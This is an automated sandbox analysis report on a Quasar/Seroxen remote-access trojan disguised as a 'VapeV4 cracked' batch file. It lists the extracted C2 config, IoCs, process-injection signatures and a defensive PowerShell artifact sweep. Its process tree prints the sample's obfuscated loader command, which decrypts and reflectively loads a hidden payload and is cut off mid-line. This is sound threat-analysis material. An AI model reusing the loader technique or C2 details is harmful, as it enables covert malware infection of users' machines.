Resubmissions
Analysis
- max time kernel: 40s
- max time network: 41s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03-06-2024 18:33
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
- Sample: https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat
- Resource: win10v2004-20240426-en
General
- Target: https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat
Malware Config
Extracted
- family: quasar
- version: 1.0.0.0
- botnet (tag): v15.6.7 | GotTermed
- c2: elated-grass-07331.pktriot.net:22233
- mutex: 3c4f9f0f-6b9b-4427-95ce-8191fe249b5a
- encryption_key: 2625A64B59BF89EF5DAC76FF4DD28779A4574274
- install_name: .exe
- log_directory: $sxr-Logs
- reconnect_delay: 3000
- startup_key: $sxr-seroxen
Signatures
-
Quasar payload 1 IoCs
- resource: behavioral1/memory/3416-205-0x000001B19BAC0000-0x000001B19C280000-memory.dmp (memory of PID 3416, $sxr-powershell.exe)
  yara_rule: family_quasar
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
The caller passes a handle to another process as the parent of the one it creates (parent PID spoofing). Here the chosen parent is winlogon.exe, PID 612, which is why the dllhost.exe instances targeted by SetThreadContext below appear under winlogon.exe in the process tree rather than under the loader.
- PID 1204 created 612 | process: 1204 VapeV4-cracked.bat.exe | target process: winlogon.exe
- PID 3416 created 612 | process: 3416 $sxr-powershell.exe | target process: winlogon.exe
- PID 3416 created 612 | process: 3416 $sxr-powershell.exe | target process: winlogon.exe
Executes dropped EXE 3 IoCs
- 1204 VapeV4-cracked.bat.exe
- 3416 $sxr-powershell.exe
- 660 $sxr-powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 11 IoCs
The loader writes the debug C runtime (vcruntime140d.dll, vcruntime140_1d.dll, ucrtbased.dll) into System32 and the second stage opens the same files again; the two .evtx entries are the EventLog service (svchost.exe -s EventLog) writing its own log files and are not attributable to the sample.
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
- File created C:\Windows\System32\vcruntime140_1d.dll | VapeV4-cracked.bat.exe
- File opened for modification C:\Windows\System32\ucrtbased.dll | VapeV4-cracked.bat.exe
- File opened for modification C:\Windows\System32\vcruntime140d.dll | VapeV4-cracked.bat.exe
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
- File opened for modification C:\Windows\System32\vcruntime140_1d.dll | $sxr-powershell.exe
- File opened for modification C:\Windows\System32\vcruntime140d.dll | $sxr-powershell.exe
- File created C:\Windows\System32\ucrtbased.dll | VapeV4-cracked.bat.exe
- File created C:\Windows\System32\vcruntime140d.dll | VapeV4-cracked.bat.exe
- File opened for modification C:\Windows\System32\vcruntime140_1d.dll | VapeV4-cracked.bat.exe
- File opened for modification C:\Windows\System32\ucrtbased.dll | $sxr-powershell.exe
Suspicious use of SetThreadContext 3 IoCs
Each loader stage rewrites the thread context of a dllhost.exe instance (PIDs 3792, 1300 and 632, the same processes that later hold SeDebugPrivilege and enumerate processes), consistent with process hollowing of a legitimately named host process.
- PID 1204 set thread context of 3792 | process: 1204 VapeV4-cracked.bat.exe | target process: dllhost.exe
- PID 3416 set thread context of 1300 | process: 3416 $sxr-powershell.exe | target process: dllhost.exe
- PID 3416 set thread context of 632 | process: 3416 $sxr-powershell.exe | target process: dllhost.exe
Drops file in Windows directory 8 IoCs
Writing directly under C:\Windows requires an elevated token, which fits the `net session` check the batch file runs first (see the process tree). The dropped executables carry names that mimic powershell.exe, mshta.exe and cmd.exe with a `$sxr-` prefix; the prefix matches the startup_key and log_directory in the extracted config.
- File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | cmd.exe
- File created C:\Windows\$sxr-powershell.exe | VapeV4-cracked.bat.exe
- File opened for modification C:\Windows\$sxr-powershell.exe | VapeV4-cracked.bat.exe
- File created C:\Windows\$sxr-mshta.exe | VapeV4-cracked.bat.exe
- File opened for modification C:\Windows\$sxr-mshta.exe | VapeV4-cracked.bat.exe
- File created C:\Windows\$sxr-cmd.exe | VapeV4-cracked.bat.exe
- File opened for modification C:\Windows\$sxr-cmd.exe | VapeV4-cracked.bat.exe
- File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | cmd.exe
Enumerates system info in registry 2 TTPs 3 IoCs
(all reads are by the browser, not by the sample)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Modifies registry class 56 IoCs
All entries are written by msedge.exe and are Explorer ShellBag / common-dialog view settings saved when the browser's file dialog handled the download (SniffedFolderType = "Downloads"); this is normal browser activity, not part of the infection chain. Below, SHELL stands for \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell.
- Set value (data) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000
- Key created SHELL\BagMRU
- Key created SHELL\Bags\1\Shell
- Key created SHELL\Bags
- Set value (data) SHELL\BagMRU\NodeSlots
- Key created SHELL\BagMRU\0\1
- Set value (str) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"
- Set value (int) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"
- Set value (int) SHELL\BagMRU\0\1\NodeSlot = "2"
- Set value (int) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"
- Set value (int) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"
- Key created SHELL\BagMRU\0
- Set value (data) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff
- Set value (data) SHELL\BagMRU\0\MRUListEx = 0100000000000000ffffffff
- Set value (int) SHELL\BagMRU\0\0\NodeSlot = "1"
- Set value (str) SHELL\Bags\1\Shell\SniffedFolderType = "Downloads"
- Set value (int) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"
- Set value (int) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"
- Set value (int) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"
- Set value (data) SHELL\BagMRU\NodeSlots = 0202
- Set value (data) SHELL\BagMRU\0\0\MRUListEx = ffffffff
- Key created SHELL\Bags\1\ComDlg
- Set value (int) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"
- Key created SHELL\Bags\2
- Set value (str) SHELL\Bags\2\Shell\SniffedFolderType = "Generic"
- Set value (int) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"
- Set value (data) SHELL\BagMRU\MRUListEx = 00000000ffffffff
- Set value (int) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"
- Set value (int) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"
- Set value (int) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"
- Set value (data) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000
- Set value (data) SHELL\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000
- Set value (data) SHELL\BagMRU\0\MRUListEx = 00000000ffffffff
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
- Key created SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}
- Set value (int) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"
- Key created SHELL\BagMRU\0\0
- Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
- Set value (str) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"
- Set value (data) SHELL\BagMRU\0\1\MRUListEx = ffffffff
- Key created SHELL\Bags\2\ComDlg
- Set value (int) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"
- Set value (data) SHELL\BagMRU\NodeSlots = 02
- Set value (data) SHELL\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000096c7af35d697da0165473838d697da0129c8fb38d697da0114000000
- Set value (int) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"
- Set value (int) SHELL\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"
- Key created SHELL\Bags\2\Shell
- Set value (data) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000
- Set value (data) SHELL\BagMRU\MRUListEx = ffffffff
- Key created SHELL\Bags\1
- Set value (str) SHELL\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"
- Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings
- Key created SHELL (\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell)
- Set value (data) SHELL\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000
- Key created SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}
- Set value (int) SHELL\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
(pid, process, number of hits)
- 1020 msedge.exe (2)
- 2308 msedge.exe (2)
- 2600 msedge.exe (2)
- 1204 VapeV4-cracked.bat.exe (5)
- 3792 dllhost.exe (4)
- 3416 $sxr-powershell.exe (7)
- 1300 dllhost.exe (4)
- 660 $sxr-powershell.exe (4)
- 632 dllhost.exe (34)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
(the browser launching its own child processes with the block-non-Microsoft-binaries mitigation policy; normal Edge behaviour)
- 2308 msedge.exe (3)
Suspicious use of AdjustPrivilegeToken 9 IoCs
- Token: SeDebugPrivilege | 1204 VapeV4-cracked.bat.exe (2)
- Token: SeDebugPrivilege | 3792 dllhost.exe
- Token: SeDebugPrivilege | 3416 $sxr-powershell.exe (3)
- Token: SeDebugPrivilege | 1300 dllhost.exe
- Token: SeDebugPrivilege | 660 $sxr-powershell.exe
- Token: SeDebugPrivilege | 632 dllhost.exe
Suspicious use of FindShellTrayWindow 31 IoCs
- 2308 msedge.exe (31)
Suspicious use of SendNotifyMessage 24 IoCs
- 2308 msedge.exe (24)
Suspicious use of SetWindowsHookEx 2 IoCs
- 2600 msedge.exe
- 3416 $sxr-powershell.exe
Suspicious use of WriteProcessMemory 64 IoCs
(all from the Edge browser process, PID 2308, into its own child msedge.exe processes; normal browser parent/child behaviour)
- PID 2308 wrote to memory of 2656 | msedge.exe -> msedge.exe (2)
- PID 2308 wrote to memory of 3936 | msedge.exe -> msedge.exe (40)
- PID 2308 wrote to memory of 1020 | msedge.exe -> msedge.exe (2)
- PID 2308 wrote to memory of 4564 | msedge.exe -> msedge.exe (20)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
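A host sweep for the artifacts this report lists, as an added example that is not part of the sandbox report or of the sample. The file paths, the `$sxr-seroxen` startup_key, the `$sxr-Logs` log_directory and the C2 host and port are taken from the config and IoCs above; where Quasar puts them is an assumption from the family's usual behaviour (a Run-key value named after startup_key when unprivileged, a scheduled task when elevated, the log directory under the profile's AppData), so the script checks all of those. The scheduled-task check uses the same Task Scheduler COM API (`Schedule.Service`) the signature refers to, including hidden tasks. Function and variable names are the example's own.

```powershell
# Added example (not part of the report): sweep a host for the Seroxen/Quasar artifacts above.
# Note: every artifact name starts with '$sxr-'. In PowerShell these MUST be single-quoted;
# inside double quotes "$sxr" would be expanded as an (empty) variable.
$StartupKey = '$sxr-seroxen'                          # config: startup_key
$LogDirName = '$sxr-Logs'                             # config: log_directory
$C2Host     = 'elated-grass-07331.pktriot.net'        # config: c2
$C2Port     = 22233
$DroppedFiles = @(                                    # 'Drops file in Windows directory' IoCs
    'C:\Windows\$sxr-powershell.exe',
    'C:\Windows\$sxr-mshta.exe',
    'C:\Windows\$sxr-cmd.exe',
    'C:\Windows\$sxr-seroxen2\$sxr-Uni.bat'
)
$findings = New-Object System.Collections.Generic.List[string]

# 1. Dropped binaries under C:\Windows.
foreach ($p in $DroppedFiles) {
    if (Test-Path -LiteralPath $p) { $findings.Add("file present: $p") }
}
# 2. Renamed PowerShell next to the lure ('<name>.bat.exe', as VapeV4-cracked.bat.exe in the tree).
Get-ChildItem -Path "$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads" -Filter '*.bat.exe' -File -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("renamed interpreter: $($_.FullName)") }
# 3. Quasar log directory (assumed under AppData of the user or of the SYSTEM profile).
$appDataRoots = @("$env:APPDATA", 'C:\Windows\System32\config\systemprofile\AppData\Roaming')
foreach ($root in $appDataRoots) {
    $dir = Join-Path $root $LogDirName
    if (Test-Path -LiteralPath $dir) { $findings.Add("log directory: $dir") }
}
# 4. Run-key persistence named after startup_key (assumed location for the unprivileged case).
foreach ($hive in 'HKCU:', 'HKLM:') {
    $runKey = "$hive\Software\Microsoft\Windows\CurrentVersion\Run"
    $val = Get-ItemProperty -Path $runKey -Name $StartupKey -ErrorAction SilentlyContinue
    if ($val) { $findings.Add("Run value '$StartupKey' in ${runKey}: $($val.$StartupKey)") }
}
# 5. Scheduled tasks via the Task Scheduler COM API, recursing into every folder and
#    including hidden tasks (GetTasks(1) = TASK_ENUM_HIDDEN).
function Get-AllScheduledTasks($Folder) {
    $Folder.GetTasks(1)
    foreach ($sub in $Folder.GetFolders(0)) { Get-AllScheduledTasks $sub }
}
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$root = $svc.GetFolder('\')
foreach ($task in (Get-AllScheduledTasks $root)) {
    foreach ($action in $task.Definition.Actions) {
        # Type 0 = TASK_ACTION_EXEC. Flag a task named after the startup key or running a $sxr- binary.
        if ($action.Type -eq 0 -and ($task.Name -eq $StartupKey -or $action.Path -like '*\$sxr-*')) {
            $findings.Add("scheduled task $($task.Path) runs $($action.Path) $($action.Arguments)")
        }
    }
}
# 6. C2 traces: an established connection to the C2 port, or the C2 name in the local DNS cache.
#    The cache is read rather than resolved so the sweep itself does not generate a lookup.
Get-NetTCPConnection -RemotePort $C2Port -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("TCP to $($_.RemoteAddress):$($_.RemotePort) from PID $($_.OwningProcess)") }
Get-DnsClientCache -ErrorAction SilentlyContinue |
    Where-Object { $_.Entry -eq $C2Host -or $_.Name -eq $C2Host } |
    ForEach-Object { $findings.Add("DNS cache entry for $C2Host -> $($_.Data)") }

if ($findings.Count -eq 0) { 'No Seroxen/Quasar artifacts from this report found.' } else { $findings }
```

Run it from an elevated PowerShell so HKLM and the task folders are fully readable. The `$sxr-` prefix is the most brittle indicator (it is a configurable string in this family), so treat a hit on the Task Scheduler or Run-key check as stronger evidence than a match on the exact file names.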
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7d0dcb43-b0b1-449d-b3ca-1afdfc87b349}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1531fde5-f422-4287-9f31-d96ec09f8af0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3d6a3d88-7e64-426d-b795-456c1f759727}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8451f46f8,0x7ff8451f4708,0x7ff8451f47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5180 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7855173899724844439,7683450040273525366,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
C:\Windows\system32\cmd.exe (level 2)
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\VapeV4-cracked.bat" "
- Drops file in Windows directory
C:\Windows\System32\Conhost.exe (level 3)
Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\net.exe (level 3)
Command line: net session
C:\Windows\system32\net1.exe (level 4)
Command line: C:\Windows\system32\net1 session
C:\Users\Admin\Desktop\VapeV4-cracked.bat.exe (level 3)
Command line: "VapeV4-cracked.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function DlXiw($jnfYj){ $QpJJS=[System.Security.Cryptography.Aes]::Create(); $QpJJS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QpJJS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QpJJS.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hq6nkjA2Agpp6rzE5ZH6qEdc87VQUGJSupueX0Nn2kI='); $QpJJS.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yCS6Miz0G0oYyOqVwRYRZw=='); $GHgia=$QpJJS.CreateDecryptor(); $return_var=$GHgia.TransformFinalBlock($jnfYj, 0, $jnfYj.Length); $GHgia.Dispose(); $QpJJS.Dispose(); $return_var;}function cuzkB($jnfYj){ $vMlyC=New-Object System.IO.MemoryStream(,$jnfYj); $jWECR=New-Object System.IO.MemoryStream; $xNVjy=New-Object System.IO.Compression.GZipStream($vMlyC, [IO.Compression.CompressionMode]::Decompress); $xNVjy.CopyTo($jWECR); $xNVjy.Dispose(); $vMlyC.Dispose(); $jWECR.Dispose(); $jWECR.ToArray();}function htDyt($jnfYj,$nQBBf){ $ryoCK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$jnfYj); $HgyeT=$ryoCK.EntryPoint; $HgyeT.Invoke($null, $nQBBf);}$zXORP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\VapeV4-cracked.bat').Split([Environment]::NewLine);foreach ($pJAbE in $zXORP) { if ($pJAbE.StartsWith('SEROXEN')) { $VXJBB=$pJAbE.Substring(7); break; 